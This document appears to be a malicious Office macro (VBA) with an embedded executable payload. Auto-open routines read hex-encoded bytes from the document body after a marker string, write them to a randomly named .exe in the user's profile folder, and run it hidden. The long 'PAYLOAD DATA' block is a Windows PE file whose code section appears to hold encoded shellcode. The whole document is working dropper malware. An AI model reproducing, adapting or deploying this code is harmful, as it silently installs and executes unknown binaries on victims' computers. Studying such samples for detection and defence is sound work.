

Sub Auto_Open()
        Fhnzy12
End Sub

Sub Fhnzy12()
        Dim Fhnzy7 As Integer
        Dim Fhnzy1 As String
        Dim Fhnzy2 As String
        Dim Fhnzy3 As Integer
        Dim Fhnzy4 As Paragraph
        Dim Fhnzy8 As Integer
        Dim Fhnzy9 As Boolean
        Dim Fhnzy5 As Integer
        Dim Fhnzy11 As String
        Dim Fhnzy6 As Byte
        Dim Ewouuraaky as String
        Ewouuraaky = "Ewouuraaky"
        Fhnzy1 = "zvFMnJKFgpJS.exe"
        Fhnzy2 = Environ("USERPROFILE")
        ChDrive (Fhnzy2)
        ChDir (Fhnzy2)
        Fhnzy3 = FreeFile()
        Open Fhnzy1 For Binary As Fhnzy3
        For Each Fhnzy4 in ActiveDocument.Paragraphs
                DoEvents
                        Fhnzy11 = Fhnzy4.Range.Text
                If (Fhnzy9 = True) Then
                        Fhnzy8 = 1
                        While (Fhnzy8 < Len(Fhnzy11))
                                Fhnzy6 = Mid(Fhnzy11,Fhnzy8,4)
                                Put #Fhnzy3, , Fhnzy6
                                Fhnzy8 = Fhnzy8 + 4
                        Wend
                ElseIf (InStr(1,Fhnzy11,Ewouuraaky) > 0 And Len(Fhnzy11) > 0) Then
                        Fhnzy9 = True
                End If
        Next
        Close #Fhnzy3
        Fhnzy13(Fhnzy1)
End Sub

Sub Fhnzy13(Fhnzy10 As String)
        Dim Fhnzy7 As Integer
        Dim Fhnzy2 As String
        Fhnzy2 = Environ("USERPROFILE")
        ChDrive (Fhnzy2)
        ChDir (Fhnzy2)
        Fhnzy7 = Shell(Fhnzy10, vbHide)
End Sub

Sub AutoOpen()
        Auto_Open
End Sub

Sub Workbook_Open()
        Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Ewouuraaky
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&HE4&H22&HE2&H2B&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDA&HD6&HBF&HFB&HDB&H57&HD6&HD9&H74&H24&HF4&H58&H2B&HC9&H66&HB9&H04&H02&H83&HE8&HFC&H31&H78&H16&H03&H78&HED&H39&HA2&HE7&HD1&HD6&H45&H18&H91&H26&H32&HE7&H21&H43&H33&H37&HFE&H76&HE3&H81&H81&H53&H39&H28&HF5&H47&H36&H90&HC6&H4E&H07&H7E&HAB&HBA&H94&HB0&HD0&H2C&H66&HC8&H36&H52&H3D&H6B&H5F&H3C&H2B&HC5&HF5&HB2&H4D&H79&H52&HD7&H35&H6A&HAA&H77&HBB&HE1&HD1&H23&H86&H67&HDF&H70&HEE&H84&HDB&H2D&HB7&H3E&H90&H95&H21&H58&H11&HDD&HB4&H5C&H06&HFA&HEA&H95&HD6&HE7&H8F&H56&HA2&HEB&H69&HC6&H9F&H10&HBF&H25&H5A&H6A&HF7&HE7&H1A&H41&H35&H3F&HA3&H63&HB7&H09&HB1&HC1&H9F&H6C&H2C&HE0&H5F&H86&HD2&H39&H5A&HF8&H00&HCD&HD6&HBB&H38&HAD&H9C&H14&HD3&HF7&HD0&H84&H06&H51&HAC&H18&H7C&H61&H36&HE5&HDE&H95&H31&H1C&HAB&H62&H43&HFD&HE3&HBC&H61&H68&HE0&H6B&HBD&HEF&H93&HD2&H9A&H20&HAA&HC0&HE2&H86&H9A&H95&H19&H4A&HFB&HDA&HAC&H5B&H05&H4E&H7A&HAF&H66&HA2&H37&H93&H38&H30&H23&HCF&H3D&H0D&HDD&HA5&H04&H36&HB1&H4A&H11&H07&HAE&H13&H45&HC8&H44&HA2&H9E&HBA&H4C&H57&H04&H78&HB0&H3B&HB7&H36&H84&H0A&H9C&H49&H8E&H23&HAE&HCB&H03&H35&H36&H1A&HCF&HE5&H67&HC7&H24&H45&H93&H54&H1D&H8E&H00&H90&H6C&H29&H7A&H2F&H1D&HBD&HD2&HB4&H75&H1B&HEA&H72&H7D&HE3&HE2&HDD&H86&H84&H11&H08&H51&HD4&HD9&HAB&HD2&HD0&H02&H77&HCA&HF7&H5E&H4D&HA7&HBA&H3C&H9E&H71&H7F&H28&HCE&HBC&H8B&HB1&H7E&HEC&HF7&HBF&HD9&H40&H7A&HD4&H83&H5D&HFC&H97&H3A&H1D&H7F&H7F&H3A&HC1&H04&HB0&H40&H26&H78&HC0&H7A&H75&HCC&HD8&HF5&H8D&H8B&H28&H84&H5A&H06&H2A&H16&HFE&H90&HDD&HFB&HD6&HB6&H03&HAB&H9D&HB8&H8E&H52&H1D&H3A&HB5&HFA&H07&HDF&HDC&H54&H85&H68&H73&HFB&H06&HC7&H5D&HC5&HC2&H07&H87&HDC&H92&H28&HF1&H9F&HC7&H66&HC4&H11&H66&HB3&H27&H68&H83&HB4&H97&H03&H85&H45&HA2&HC5&HFF&H63&HA2&HCF&H51&H2B&HAB&HEB&HF7&HF2&H3D&H17&H5E&H99&HC9&H09&HEE&H36&HB7&H2D&H4E&H54&H36&H7D&HAB&HD8&HA0&H9A&H8D&H48&HD9&H58&HC5&HAE&HCE&HF6&H06&H6A&H0A&H95&HF5&HE6&H29&HBE&H72&H21&H66&HAB&H85&H8A&H75&HEE&HA3&HF7&HEA&H11&HCA&HE9&HDD&HAA&H15&H58&H15&H73&H73&H9F&H26&HFA&HF2&HFC&H9E&H89&H0F&H33&HE7&HE3&H68&HCC&H1F&H11&HBA&H52&H9D&H2F&HC0&HA5&HB4&HCD&H87&H05&HC5&H88&HA8&H7B&H01&H09&HCD&HF6&HBC&HDF&HC2&HA8&H04&H09&H06&HEA&H80&H6E&H52&H28&H12&HCC&H42&HA8&H62&H36&H55&H64&H58&H5B&HDB&HAB&HE0&HC8&HD8&H96&H5B&HBF&HC4&H19&HDE&H89&H5D&H7B&H80&HC8&H3A&HEA&H29&HF6&HF2&H07&HE1&H48&H2B&H9D&HD4&H95&H62&H8D&HBB&H8D&H3D&H12&HDB&HAD&H4F&H7B&H02&HD3&H23&H54&HAB&H6E&H7F&HA6&H1E&H6F&HF2&H3A&H65&HC8&H48&H49&H58&H1F&HDD&H55&HE0&H26&H47&H5F&H36&HFA&HE9&HD3&H61&H15&HB8&HFE&H29&HEE&H10&H73&HF5&H1D&H17&H50&H71&H0E&HF3&H1B&H51&H81&H98&HE9&H00&H34&H09&HB6&HBD&HA1&HC0&H41&H2E&H60&HE3&H3E&H13&HC3&H20&HC8&HBB&HFB&HBE&H53&HAC&HA4&HD9&HD0&H16&H28&HE0&HD4&H4F&H9C&HCC&H81&H7E&HCF&H5D&H99&HE6&HE7&H5D&H76&H0E&H38&H33&H3C&HB6&H9F&H89&HE0&HFE&HCB&H5F&H27&H50&HA9&H37&H9E&H31&HC0&H31&H8A&HCC&H1C&H08&H0C&H63&H52&H5F&H39&HCF&HBB&HFD&H9D&H27&H70&H2E&H42&HB0&HC6&HE7&H8C&H87&HAE&H77&H5F&HAC&H84&H5B&H5B&HA9&HB8&H21&H78&H7E&H7B&H4D&H8E&HFD&H2B&H29&H69&HDD&H08&H44&H1A&HE9&H2F&HB2&H09&HFF&HF7&H36&HAD&HC7&HB7&H28&H64&HCC&HE4&H28&H03&HC7&H17&H20&HAD&H43&H66&H75&HE3&H33&H6F&H7A&H5B&H8D&HC8&H2A&H12&H78&H75&H1E&H01&H4C&H92&HEB&HD4&H59&HF2&H38&H73&H85&H49&HFD&HE8&H60&H83&H7B&H87&H14&H4E&H2A&H67&HED&H12&H7A&H63&H8D&H8C&H86&H46&H3F&H0C&HC5&HDD&HA0&H30&H3F&H01&HCE&HBE&H48&H52&HAB&H80&H53&HCB&HEC&H77&H56&H40&H90&H9E&HBD&HD9&H2C&HF6&H5B&H68&H1B&H36&HA3&H7E&H16&H42&HEA&HBC&H41&H04&H56&HBB&H4F&H72&HD3&HCD&H96&HA9&H8B&H7F&HD2&H7E&H9C&H75&H73&HF1&H74&H5E&HE6&HDE&H74&H07&H19&H73&HF9&H57&H31&H1D&H04&H47&H8B&H32&H8A&H21&HCA&H38&H7B&HB4&H57&HF1&H58&H79&H58&H80&H3D&HF3&H6B&HAE&HD1&H36&H98&HF3&H29&H88&HEF&HE7&HF7&HCA&H7D&H29&H17&HF3&HAD&H5B&HA5&HCB&H2F&HE5&HC5&H35&H23&H8D&H47&H28&H43&HC0&HD5&H39&HC4&H12&H92&HD0&H33&HF7&HC5&HDA&H33&H0A&HB9&H9C&H43&H01&H4F&HDF&HB7&HA4&H3B&HA5&H6F&HCA&H96&H6A&HC6&H3A&H56&H06&HC1&HF6&H25&HDA&HA9&H9B&H50&H6E&HF4&HF7&HAA&H1B&H77&HB3&H62&H0A&HDD&H7F&H9B&H6C&H52&HC2&HCC&HD2&HC7&H7A&HF7&H1B&H3D&H10&H56&H90&H99&H95&HCD&H47&H5D&HF8&H7A&HEF&H0D&HD6&H04&HDC&H33&H63&H7D&H5F&H93&H07&HE1&H34&HCA&HD5&H32&H5F&H0F&H0E&H6E&H2D&HB2&HAA&HB7&H62&H36&HAD&H2A
&HE9&H0D&HB6&H2E&HDF&HAB&H7F&H16&H90&H26&H77&H78&H0A&H98&H1E&H56&H9F&HF2&HFC&H61&HEE&HAA&H4F&HB1&HA5&H26&HC0&H94&H9E&H61&H13&H34&HB8&H40&H72&H0A&H42&HCE&HE8&HB8&HAC&HD8&H02&H1C&HE2&HB1&HF0&HE7&H5C&HD2&HC1&H10&HB2&H43&H04&H8C&H4A&H37&H02&H9A&H31&H8F&H3A&H86&H1B&HDE&HE2&H02&HC8&HC8&H36&H6B&HB5&H32&HD1&H02&H37&H8C&H74&H1D&HC7&H75&H2B&HBD&H8B&H00&H93&H28&H23&HF9&H23&HE0&HCE&H89&H81&HC2&H7B&H73&HEA&HFA&H31&HE4&HF6&HDC&H88&HC2&HF9&H20&HA7&H8C&H1E&H91&H5C&HB6&H7E&H27&H5E&H3F&H5A&H61&H71&H1B&H7A&H39&H18&H1F&H05&HA5&H30&HF0&H89&H16&HFF&HDD&H5C&HCA&HB9&HCE&H9D&HAB&HDE&H9A&HFE&H8E&H69&H41&H92&H03&HA1&H92&H28&HF4&H89&HD6&H6A&H58&H3A&HD3&HDE&H18&H3F&HEC&H18&H59&HB9&HC0&HFD&H7E&HDB&HEB&HD9&H87&HF5&H11&H11&H41&H80&H63&H7A&HCE&H02&H2B&H4F&H4F&HDE&HA6&H41&H9B&H9C&H59&H17&HDE&H91&HA2&H68&HB0&H7D&H80&H09&H06&HBA&HB8&H5C&HA0&H37&H10&HF2&H1C&H9E&H35&H0F&H66&HAE&H42&H99&H6B&H0F&HBA&H0A&HDB&HA4&H9F&HD9&HE2&H1A&H50&H1C&HF5&H53&H50&HDD&H0C&H90&H54&HCB&H79&HEE&H0E&HD5&H4F&H96&HFB&H8B&HAB&HF0&H21&HAE&HC8&HE2&HF2&H6D&H25&H86&H31&H3C&H4E&H0A&H38&H32&H7A&HD8&HEA&HB6&HE0&H94&H13&H22&H3B&H36&HA6&HFD&HCA&HB6&H15&H09&H60&HA4&H7C&H64&H96&H51&HCC&H2F&HE9&HAF&HCD&HCD&H08&H1C&H3F&H26&H46&H69&H29&H89&H4A&H95&H73&H42&HCE&H14&H1B&HC8&HF0&HFD&HAC&H37&HB6&H92&H4F&HE7&H6A&HDD&H6E&H87&HC1&H0E&H29&HF1&HA2&HBE&H99&H89&HC8&H1E&H29&H76&HC7&H36&H7D&HAC&H04&H16&HFE&H03&HBF&H6D&H36&HA6&HB2&H4A&H46&H59&H95&HA3&H03&H47&HC6&H34&H04&H1A&HD6&HCC&H8A&H8A&HBF&HEB&H2F&H83&HB7&HCC&HDF&H63&H3D&HEA&H03&HFE&H75&H5E&HED&H59&H59&HAF&H6A&HA4&HAC&H07&H68&H05&HAA&HA2&H75&H2D&H05&H07&H72&H8F&H07&H7E&H7D&HE2&H01&HBA&H4D&H13&HE6&H5E&HE0&HCB&HB1&HF5&H63&H5D&HEA&HB5&H31&H38&H21&H1F&HAD&H5B&H12&H3F&H43&HA0&HE0&H85&HA2&HCF&H74&H66&H1F&HED&H98&HA5&H83&HE2&H84&H06&H80&H46&HBA&H0F&HF6&HCF&HA2&H84&H06&HBB&HE7&H1F&H3C&H67&H1E&H5C&H8A&H74&HA0&H53&HCE&H13&HE7&H9F&HE3&H40&HB8&H8E&H5E&H75&H95&H34&HAD&H46&H6A&H8B&HDE&H48&HCD&H29&H0A&H6B&H70&H4D&HA4&H80&H50&H5E&H6A&HA6&HE5&H30&H24&H40&H64&H9F&HF0&HA2&HEB&HE1&H40&H2C&HC9&HE8&H6E&H87&H89&H9C&HCD&HD9&H91&H2A&HCF&HC1&H10&HA6&HF9&HC1&H9B&HA1&H92&HAA&HCA&H41&H50&H72&H65&H15&H6E&H31&H44&H52&H49&H0A&H47&H70&H04&H91&H03&H79&H64&HAD&H95&HFA&H7B&H44&H78&H19&HD3&HE1&H8A&H81&HE7&H58&H0E&HD4&H51&HF0&H08&HB2&H50&H98&H70&H19&HD6&H44&H3C&HE4&HC3&H2D&H60&H20&H6C&HD4&H88&HCB&H35&HDF&H52&H2A&HC8&H81&HFC&HC1&H0F&H97&H8B&H77&H5B&H6B&HE4&H87&HD4&H92&H68&H89&H6A&H99&H99&HA2&H5A&H7A&H77&H3E&HB9&HC1&H68&HEC&H9B&H48&HCE&HDB&H79&H5F&HA9&H3C&HC0&HE0&HCA&H3C&HD9&H28&H46&H62&HBA&HFB&H81&H1B&H3B&HE1&HB3&H19&HCF&H38&H76&HE8&HF1&H8B&HE5&HF3&H26&H45&HF2&H58&H0B&HED&H9A&H06&H88&H39&HC2&H9D&HF4&HC2&H8B&H60&HA3&H56&H39&H95&HE1&H70&H2F&H8E&H55&HFF&H61&H40&H2B&HDD&HA7&HA5&HD8&H70&HCC&HDA&H0B&H3A&H8D&H26&HAA&H71&H94&H1E&H73&H5B&H7D&H7E&HE7&H76&H5D&H41&H40&HEA&H06&HC7&H07&H5E&H9F&H18&H71&H6F&H67&HBF&HC4&H62&H38&H3C&H17&HEB&H0A&H48&H08&H9E&HC7&H0F&HBA&H9D&HAC&H3D&H2F&HFD&H8E&HA4&HD5&H06&HB4&HDF&HA7&HF3&H89&H9E&HDE&H5D&H89&H45&HF4&H4C&HC7&H65&HAD&H6D&H3E&HE8&HF4&H91&H07&H67&HDF&H06&HEF&H74&H10&H35&H08&H55&H30&HAC&H94&H07&H5A&H17&HDE&H75&H94&H8E&H13&H2F&H91&HAD&H48&H90&H8F&H0D&HA2&H7F&HB9&H64&H36&HA2&H89&H1C&H0C&HD3&HCD&HF5&H2B&HE1&HF4&HB3&H18&H4A&H50&HAF&H80&H91&H51&H5A&H6D&H31&H35&H3C&H98&H78&HAA&H98&H51&HDE&HD8&HAD&H77&HF1&H5F&H82&H37&H79&H7D&H65&H68&HFF&H82&HB7&H39&H38&H82&HCF&H40&H17&H3B&H76&H37&H80&HB0&H05&H85&H56&H4A&H03&H42&H42&HB2&HDC&H9F&H82&H4D&HF9&H46&H96&H44&H70&H3A&H52&H66&H93&H26&HB4&HAD&H0F&HAB&H9E&HA4&H11&H44&H42&HE4&HFC&H61&HFC&HAF&HC7&HA3&HC0&HFB&H0F&H06&HC5&HE5&H78&H5C&HC6&H90&H48&H77&H9F&H62&HC6&H55&H98&H14&H66&H8E&HA2&H5A&H33&H74&H87&HDA&H8B&H45&H0F&H8F&H2A&HC2&H41&H03&HC3&H65&HAD&HC7&H5B&H49&HD5&H90&HEE&H5F&H50&HC4&HCE&H1F&H0F&H08&HFF&HEF&HFC&HD7&H5C&H5A&H8F&H11&H19&HC7&H33&H25&HF9&H27&HFA&HDB&HCD&H11&HAD&H5F&H44&H04&H72&H44&H73&H15&HDF&H5C&HDF&HAA&H8C&H12&H8A&H27&H3D&HDC&H9B&HC4&H66&H47&H48&HB3&HB2&HAA&HCC&H77&H25&H6F&H45&HF0&H64&H01&H5C&H46&H5A&H65&HC5&HA1&H8E&H5A&H18&H43&H1C&H3E&HDE&HB1&HDE&H30&H73&HDB&HBA&H84&HB8&HBF&H07&H85&HD8&HC4&HEB&H40&H97&H3E&H51&HAE&HFB&HCD&HD3&HD4&H66&H1E&H04&H4F&H40&HC3&H99&H42&HD3&H46&H0B&H8F&HB2&H02&H33&H41&H59&H30&H0C&H6D&H50&HE4&H92&H6B&H20&H05&H48&HB2&H3C&H00&HF6&H64&H94&HEB&H52&HE5&HD5&H62&HBE&H1A&HEF&H33&HC4&H6D&HD1&HF2&HEC&HC2&HFC&H67&H65&H8D&H2C&H1D&H27&HE5&HCF&HB4&H8B&HD0&H8C&HE7&HBC&HE7&H0F&H8E&HA7&H84&H72&H8D&H8C&HF7&HB4&H82&H75&H45&HD9&H11&HEC&H21&H14&HD7&HB8&H45&HBD&H5A&HB3&H39&HCD&H13&H89&H79&HB2&H04&H35&H66&HA3&HC8&HE1&H06&H1E&H77&H61&H6B&H44&HB6&HD5&H12&H47&H9B&HA2&HFF&HAA&H3F&H52&H37&HAF&H19&HC8&H9A&HED&HAF&HC0&H79&H1E&H19&H12&H10&HCD&H3C&HC7&H86&H5A&HA8&H6C&H84&HF0&H93&H7E&H95&HAB&H72&H19&H81&HB2&H63&H7D&HAB&H92&H0F&HE5&H7B&HC1&H1C&HE0&HE5&H45&H64&H96&HCB&H28&HBF&HC3&H99&H4A&HFB&HF4&H6D&HF5&HD6&HAC&H06&HA8&HA7&H7B&H81&H33&HFE&H73&HCE&HAA&H46&HC3&HD1&HB2&HF6&H89&HC9&HA7&H30&H5A&HC4&H2F&HED&HA3&H5D&H82&HD4&H26&H6B&HA7&HA7&HFD&H1C&HF1&H22&H80&H73&H69&HF5&H09&H09&H2B&HB2&H29&H72&H22&HFA&H75&HE5&HFC&HA7&HD4&H2C&HB3&HAB&HD3&H67&H67&H4B&H1A&H17&H4B&HA9&H3D&H84&HF0&HDC&H30&HB2&H74&HC1&H89&H2E&HAC&H0F&HF9&H0E&HBF&H0E&H33&HE9&H09&H99&HAA&HF3&HAB&H73&H61&HBF&HC1&HB4&H65&H74&H06&H63&H01&H97&H36&HC2&H33&HE4&H42&H85&H4B&H17&H45&H19&H77&H5D&H3A&H23&H20&H1F&H3F&HF4&H90&H8A&HCF&H40&H0D&H12&H46&H8E&H08&H99&H6E&H19&HFB&H5F&H74&HF2&H03&H55&H20&H2B&H54&H18&H71&H7A&H77&HC9&HD7&H4B&H58&H86&H22&HC6&HA7&H7B&H8E&HCD&H97&HE7&H4A&HA1&HB2&H80&H3B&HBC&HDC&HDE&HB4&H1D&H1C&HB3&HB0&H4B&H97&HE3&H04&HED&H48&H11&HB9&HD2&H73&HF9&H76&HE9&HC6&HED&HD4&H78&H29&HB9&HB1&HD9&H82&HFC&H29&HB8&H05&H51&HCF&H44&HAE&H62&HCF&H77&HBB&HCC&HCF&H2D&HB9&HD4&H1B&HA7&HE3&H27&HD2&H75&H35&H09&H30&H32&HEB&H62&H5C&H72&H2D&HA2&H2E&HA7&HAF&H35&H1E&HA0&H11&HCD&HE1&H67&HBB&H92&HC6&H16&HC0&H9F&HD2&HE5&H95&H8B&H87&HE8&HA1&HA0&H9D&H95&H3F&HD7&H05&H81&H02&H41&HD4&H98&H7F&HC1&HEE&H09&HBB&H0B&HD2&HF2&HBB&H23&H76&H8F&H4C&H9F&HD5&H07&H51&H70&HE8&HAF&H2C&HCA&H3F&H88&H6E&H35&H13&HC4&HBF&H03&H42&H46&H99&H27&H62&H95&H0D&HD7&H3F&HCD&H4D&H7C&H01&H49&H17&H12&H99&H55&H62&HDF&H3B&HDD&HEB&HD6&HB2&HFE&HAE&H73&HD9&H6F&HCF&H1E&HBA&H69&H58&HAA&H7F&HAE&HE5&H36&H46&H54&H57&HEB&H30&H9E&H62&H4A&HFB&H2B&HD8&H94&H22&HAF&HEE&H80&H7D&HE8&H89&H4E&HDA&H72&HF7&H2D&HA6&HB4&HF5&H12&H2F&HFA&HDC&H50&H09&H94&H90&H14&H5D&H25&H0A&H47&H09&H59&H05&H24&H0E&H02&H2D&H05&H3D&HA9&H76&H75&HB8&HEC&HA3&HBA&H3B&H95&HEB&H90&H7B&HBD&H6A&H53&H53&H8B&H4E&H62&H70&H76&H01&HD4&H3D&H64&HB0&HD5&HBF&HA5&HE4&H9B&HD4&HF8&H67&H23&H88&H32&H99&H6E&H56&HF8&HDD&H21&H38&H67&H2A&H2E&H05&H75&H50&H5E&H84&H82&H20&HD1&H69&H88&HC4&H7A&H75&H25&HF5&H14&H2C&H04&HF6&H53&HA2&HC9&H6C&HFD&H34&HE4&H2F&H18&HF0&H7C&H4F&H66&H6B&H1A&H4C&HDD&HC2&H6B&H4A&H8A&H94&H32&H17&H64&HC1&H7E&H93&H8F&HBB&HD1&H70&H70&HBB&HDB&H7E&HCD&HF6&H7D&HD6&H5A&H19&H56&H43&H78&H9F&HDA&HF6&HA8&H4B&H64&HBB&H37&HF6&H98&HA8&H76&H83&H96&H5A&HE5&HA4&H0F&HF2&H6B&H91&H40&H8C&HF7&H52&H05&H28&H56&HB4&H19&HD0&H1B&HAF&HB1&H3A&H43&H5A&HF5&H27&H57&H3F&HE2&H55&HA7&H8B&HD3&H31&HE9&H51&H42&H5C&H42&HF9&HAC&H9A&H3D&HA2&H8F&H8C&H39&H87&H8E&H6D&H26&HA0&HBE&H2D&H9F&H41&H26&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
